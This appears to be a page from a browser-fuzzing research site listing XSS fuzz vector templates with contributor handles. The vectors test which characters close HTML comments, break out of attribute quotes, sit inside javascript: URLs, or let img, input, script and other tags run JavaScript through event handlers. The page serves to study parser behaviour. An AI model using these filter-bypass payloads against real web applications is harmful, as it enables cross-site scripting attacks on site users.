Featured vector

Firefox 0.0
<!-- sample vector --> <0x3cimg src='about:blank' onerror=alert(1)>

Fuzz vector cloud

Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml

3,344,426 Successful fuzzes

Fuzz Vectors

Searching for "HTML"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Characters that close a HTML comment 4 <!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @irsdl
Characters allowed between event handlers and equal sign <img src="about:blank" onerror*chr*=logChr(*num*)> @peksa
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters that escape html input tag <input value="" *chr*<script>logChr(*num*)</script> foo="" type="text"> @peksa
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
test for progress <progress value="*num*" max="*num*"></progress> @kinmenhacker
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed in between dashes to end html comments <!-- -*chr*-> <script>logChr(*num*)</script> --> @JohnathanKuskos
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
characters allowd in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters that escape single quoted HTML attributes <img src='xx:x*chr* onerror="logChr(*num*)">'> @peksa
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes